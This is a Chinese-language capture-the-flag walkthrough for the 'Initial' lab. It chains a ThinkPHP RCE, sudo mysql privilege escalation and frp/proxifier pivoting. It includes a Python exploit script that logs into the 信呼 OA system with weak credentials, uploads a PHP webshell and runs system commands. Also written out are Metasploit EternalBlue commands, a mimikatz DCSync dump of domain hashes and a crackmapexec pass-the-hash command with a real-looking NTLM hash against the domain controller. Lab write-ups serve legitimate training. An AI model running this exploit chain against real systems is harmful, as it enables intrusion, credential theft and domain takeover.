03Scx122024-05-31文章来源:SecHub网络安全社区
Initial是一套较为简单的靶场,该靶场较为简单,涉及内网流量代理,frp、proxifier的使用以及横向hash传递攻击,该靶场只有一个flag分布在不同靶机上。
开局给ip用nmap扫描端口
开启80,22端口访问发现为thinkphp框架尝试RCE
进去发现是www-data权限
sudo -l发现mysql可以免密使用
查找第一个flag
sudo mysql -e '\! find / -name flag*'
抓取flag
sudo mysql -e '\! cat /root/flag/flag01.txt'
ifconfig发现内网网段 172.22.1.0/24
fscan扫描
内网基本信息
172.22.1.2 DC域控
172.22.1.21 MS17-010永恒之蓝
172.22.1.18 信呼OA系统
frp代理
服务器:frps.ini绑定本地5987端口
目标主机:frpc.ini
proxifier代理(地址为服务器ip)
弱口令 admin admin123
信呼OAexp
import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)
拿到上传路径getshell
prixifier代理蚁剑流量
拿到flag02
kali代理流量
vim/etc/proxychains4.conf
msf攻击
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit
调用mimikatz抓取hash
load kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit # 导出域内所有用户的信息(包括哈希值)
使用crackmapexec攻击访问DC
proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}
